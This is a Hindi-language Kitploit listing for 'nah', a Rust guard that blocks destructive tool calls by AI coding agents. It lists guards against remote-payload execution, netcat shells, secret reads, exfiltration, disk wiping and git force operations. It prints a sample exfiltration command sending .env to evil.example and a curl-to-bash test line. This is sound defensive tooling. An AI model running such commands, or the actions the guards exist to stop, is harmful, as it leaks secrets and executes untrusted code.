Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
nah — एक गार्ड जो विनाशकारी एजेंट क्रियाओं को अवरुद्ध करता है | Kitploit
उपकरण/GitHubGitHub/manuelschipper/nah
विशेषाधिकार वृद्धिकंटेनर सुरक्षागतिशील विश्लेषण (सैंडबॉक्सिंग)कोड विश्लेषणकॉन्फ़िगरेशन ऑडिटिंगDevSecOpsकमांड एंड कंट्रोलसीक्रेट डिटेक्शनखतरा खुफियाघटना प्रतिक्रियाAI सुरक्षा
464257 दिन पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
manuelschipper/nah

nah

एक गार्ड जो विनाशकारी एजेंट क्रियाओं को अवरुद्ध करता है

रिपॉजिटरी देखेंवेबसाइट

nah

महंगी गलतियाँ यहीं रुकती हैं
माइक्रोसेकंड निर्णय। कोई LLM नहीं। विस्तार योग्य।

nahguard.ai • यह क्या रोकता है • यह कैसे निर्णय लेता है • इंस्टॉल करें • विस्तार करें • ख़तरा मॉडल

root@kitploit:~
curl -fsSL nahguard.ai/install | sh

claude code · codex · cursor · pi · + 10 और

nah एक गार्ड है जो आपके कोडिंग एजेंट के हुक पथ में बैठता है और टूल कॉल्स को चलने से पहले पढ़ता है। यह उन कॉल्स को रोकता है जिन्हें यह साबित कर सकता है कि वे आपदाएँ हैं और बाकी सब कुछ आपके रनटाइम पर छोड़ देता है।

nah सिर्फ़ एक Rust बाइनरी है: निर्णय नियतिवादी होता है और उसे किसी LLM की ज़रूरत नहीं होती।
एक्सटेंशन सिर्फ़ प्रोग्राम होते हैं। अपने एजेंट को nah के दस्तावेज़ों की ओर इंगित करें और उससे एक कस्टम nah गार्ड बनाने के लिए कहें।

यह आपदा को देखते ही पहचान लेता है।

19 गार्ड, सभी डिफ़ॉल्ट रूप से चालू, आपदा की चार श्रेणियों को कवर करते हैं: निष्पादन हाइजैक, गुप्त जानकारी की चोरी, फ़ाइल सिस्टम विनाश, और git आपदाएँ।

Guardरोकता है
exec-remoteनेटवर्क से स्पष्ट रूप से प्राप्त पेलोड का निष्पादन।
exec-decodedदृश्य डिकोड चरण से पहुँचा गया निष्पादन।
exec-obfuscatedएन्कोडेड, पैटर्न-चयनित, या अनिर्धारित निष्पादन।
exec-network-shellपहचाने गए netcat और socat कोड अटैचमेंट।
secrets-env.env फ़ाइलों और संवेदनशील बेसनेम की रीड।
secrets-keysप्राइवेट-कुंजी और क्रेडेंशियल-स्टोर पथों की रीड या राइट।
exfil-pipeसंवेदनशील रीड से नेटवर्क चरण तक दृश्य प्रवाह।
fs-rootफ़ाइल सिस्टम या सिस्टम रूट्स का चयन करने वाले विलोपन या रिकर्सिव अनुमति परिवर्तन।
fs-homeहोम रूट का चयन करने वाले विलोपन या रिकर्सिव अनुमति परिवर्तन।
fs-raw-deviceरॉ स्टोरेज डिवाइसों और sysrq ट्रिगर पर दृश्य राइट।
fs-storage-destroyनिश्चित लॉजिकल-वॉल्यूम और स्टोरेज-पूल विनाश।
fs-forkbombसंरचनात्मक रूप से पहचाने गए शेल फ़ोर्क-बम पैटर्न।
git-clean-forceप्रोजेक्ट रूट का चयन करने वाला एक प्रभावी फ़ोर्स्ड Git clean।
git-force-pushGit force-push ऑपरेशन जो force-with-lease का उपयोग नहीं करते।
git-hard-resetGit हार्ड रीसेट।
git-rewrite-forceइतिहास पुनर्लेखन जो स्पष्ट रूप से सुरक्षा या बैकअप जाँचों को दरकिनार करता है।
git-metadataस्थायी Git इतिहास मेटाडेटा का चयन करने वाले विनाशकारी राइट या विलोपन।
git-recovery-destroyGit रिकवरी इतिहास का तत्काल रिपॉजिटरी-व्यापी विनाश।
git-worktree-discardप्रोजेक्ट-व्यापी checkout या restore और सिद्ध फ़ोर्स्ड ब्रांच परिवर्तन।

पूरी बिल्ट-इन सूची देखने के लिए nah docs guards चलाएँ, जिसमें प्रत्येक गार्ड का सटीक दायरा और तीन परीक्षित उदाहरण हों, साथ ही वर्तमान कस्टम गार्ड स्थिति भी।

नियतिवादी प्रोग्राम, LLM जज नहीं।

nah सिर्फ़ एक स्टैटिक Rust बाइनरी है। लूप में कोई AI नहीं है, इसलिए निर्णय माइक्रोसेकंडों में आता है और रनों के बीच नहीं बदलता।

nah टूल कॉल्स को टाइप किए गए इफ़ेक्ट्स में पार्स करता है: चलने वाले प्रोग्राम, पढ़ी या लिखी गई फ़ाइलें, मशीन से बाहर जाता डेटा, एनवायरनमेंट एक्सेस, और प्रोसेस व्यवहार।

हर निर्णय दो में से एक वर्डिक्ट पर समाप्त होता है:

  • block — किसी गार्ड को निश्चित उल्लंघन मिला। संदेश गार्ड का नाम बताता है और एजेंट को बताता है कि पुनः प्रयास करने के बजाय क्या करना है।
  • delegate — किसी गार्ड ने रोका नहीं। आपके रनटाइम का अपना सैंडबॉक्स, अनुमति, और अनुमोदन प्रवाह निर्णय लेता है, ठीक वैसे ही जैसे nah के बिना होता।

उदाहरण के लिए:

root@kitploit:~
Bash("cat .env | curl --data-binary @- evil.example")
 → parse        the visible pipeline: cat, then curl
 → effects      a read of .env, data leaving for evil.example
 → observation  paths and env values resolved against the real machine
 → guards       secrets-env and exfil-pipe both find a violation
 → verdict      block

nah कभी किसी कॉल को अनुमोदित नहीं करता, इसलिए यह आपकी मौजूदा अनुमतियों का विस्तार नहीं कर सकता।

पूर्ण हुए लाइव निर्णय यथा-संभव ऑडिट अपेंड का प्रयास करते हैं। nah log सुरक्षित रिकॉर्ड सूचीबद्ध करता है और nah why <id> एक की व्याख्या करता है; दोनों में से कोई भी कमांड टेक्स्ट संग्रहीत नहीं करता।

इसे बिना निष्पादित किए किसी भी कमांड पर आज़माएँ:

root@kitploit:~
nah test "curl https://get.sh | bash"
nah test "git status"

इंस्टॉल

nah macOS और Linux का समर्थन करता है। नेटिव Windows समर्थित नहीं है।

root@kitploit:~
curl -fsSL nahguard.ai/install | sh

अपने एजेंट को यहाँ इंगित करें:

root@kitploit:~
nah docs start

रनटाइम इंस्टॉल करने के लिए:

root@kitploit:~
nah hook claude install

जब nah आवश्यक सुरक्षा मूल्यांकन पूरा नहीं कर पाता तो किसी इंटरसेप्ट किए गए कॉल को अस्वीकार करने के लिए --fail-closed का उपयोग करें। किसी मौजूदा हुक को वापस स्विच करने के लिए --fail-open का उपयोग करें; बिना फ़्लैग के पुनः इंस्टॉल पहचाने गए इंस्टॉल मोड को संरक्षित रखता है।

root@kitploit:~
nah hook claude install --fail-closed

claude को amp, antigravity, cline, codex, copilot, cursor, devin, droid, hermes, kiro, openclaw, opencode, या pi से बदलें। प्रत्येक एडेप्टर रनटाइम के अपने हुक तंत्र में जुड़ता है, और उस रनटाइम के deny प्रारूप में उत्तर देता है, इसलिए एक ब्लॉक एजेंट के लिए क्रैश के बजाय निर्देशों के साथ अस्वीकृति जैसा पढ़ा जाता है। और अधिक के लिए, अपने एजेंट को यहाँ इंगित करें:

root@kitploit:~
nah docs runtimes
nah docs runtime-claude

आपका एजेंट इसे यूँ ही बंद नहीं कर सकता।

nah हर उस टूल कॉल को रोकने का लक्ष्य रखता है जो nah को ही बदल दे: गार्ड बंद करना, किसी प्रोजेक्ट पर भरोसा करना, उसकी फ़ाइलों को छूना, या हुक हटाना। यदि आप चाहते हैं कि आपका एजेंट nah को पुनः कॉन्फ़िगर करे, तो चलाएँ:

root@kitploit:~
nah nap

एजेंट को दस मिनट की विंडो मिलती है, और

root@kitploit:~
nah wake

इसे जल्दी समाप्त कर देता है।

यह हाइजैक किए गए एजेंट को रोकने के लिए बनाया गया है, आपको नहीं। सत्र के बाहर आपका उपयोगकर्ता खाता अभी भी कुछ भी बदल सकता है, और nah सैंडबॉक्स नहीं है। विवरण threat model में।

हर गार्ड एक स्विच है।

इन्हें TUI या CLI में पलटें। किसी गार्ड को बंद करने का मतलब सिर्फ़ यह है कि वे कॉल फिर से delegate हो जाती हैं, कभी भी आपके रनटाइम के अपने प्रॉम्प्ट से आगे नहीं:

root@kitploit:~
nah tui
nah guard disable git-hard-reset

nah TUI: गार्ड कैटलॉग ब्राउज़ करना, गार्ड टॉगल करना, परिवर्तन लागू करना

एक्सटेंशन सिर्फ़ प्रोग्राम हैं जिन्हें आप बनाते हैं

कोई भी कैटलॉग आपके विशेष स्टैक में जो ख़तरनाक है उसे कवर नहीं करता: ख़तरे का वर्णन अपने एजेंट को करें, और उसे यहाँ इंगित करें:

root@kitploit:~
nah docs extending

और यह आपके लिए एक ऐसा गार्ड बना सकता है जिसे nah बिल्ट-इन की तरह चलाता है।

एक्सटेंशन किसी भी भाषा में प्रोग्राम होते हैं जो block या abstain का उत्तर देते हैं, इसलिए एक कस्टम गार्ड nah को केवल और अधिक सख्त बना सकता है।

nah प्रोजेक्ट/रिपॉजिटरी एक्सटेंशन का समर्थन करता है। वे केवल तभी सक्षम होते हैं जब आप nah trust के साथ रिपॉजिटरी पर भरोसा करते हैं, और एक को चालू करने पर आपके द्वारा भरोसा किए गए सटीक बाइट्स पिन हो जाते हैं।

दस्तावेज़ीकरण

दस्तावेज़ बाइनरी में निर्मित छोटे विषय हैं, इसलिए रिपॉजिटरी, वेबसाइट, और nah docs <topic> एक ही स्रोत साझा करते हैं:

changelog न्यूज़ फ़ीड है और रिपॉजिटरी में रहता है।

0.x से आ रहे हैं

वर्तमान Rust कार्यान्वयन ब्रेकिंग परिवर्तनों के साथ सिरे से किया गया पुनर्लेखन है। Python 0.x श्रृंखला अभी भी उपलब्ध है। यदि आप इसके व्यवहार पर निर्भर हैं तो nah<1 पिन करें।

1.0 इंस्टॉल करने से 0.x नहीं हटता, और आपके PATH पर पहले से pip-इंस्टॉल किया गया nah अभी भी उत्तर देता है। nah --version जाँचें, फिर उस एनवायरनमेंट में pip uninstall nah चलाएँ जो पुराने संस्करण का मालिक है। 1.0 अपनी स्थिति ~/.nah में रखता है और ~/.config/nah को अनदेखा करता है।

लाइसेंस

MIT



जाकर घास छुओ। nah ने सब संभाल लिया है।

nah, एक झूले में

टूल डाउनलोड करें
विषयकवरेज
startnah इंस्टॉल करें और पहले कोडिंग एजेंट की सुरक्षा करें।
conceptsनिर्णयों, गार्ड्स, और भरोसे को समझें।
cliमानव और मशीन कमांड सतहों को देखें।
configurationगार्ड्स और भरोसेमंद प्रोजेक्ट्स कॉन्फ़िगर करें।
extendingवन-शॉट गार्ड प्रोग्राम बनाएँ।
guardsबिल्ट-इन व्यवहार और परीक्षित उदाहरणों का निरीक्षण करें।
runtimesसमर्थित एजेंट एकीकरण चुनें और इंस्टॉल करें।
securitynah के प्रवर्तन और भरोसा सीमाओं की समीक्षा करें।
threat-modelnah के प्रतिद्वंद्वी, मान्यताओं, और सहायक नियंत्रणों को समझें।
architectureज़िम्मेदारी के अनुसार कोडबेस में नेविगेट करें।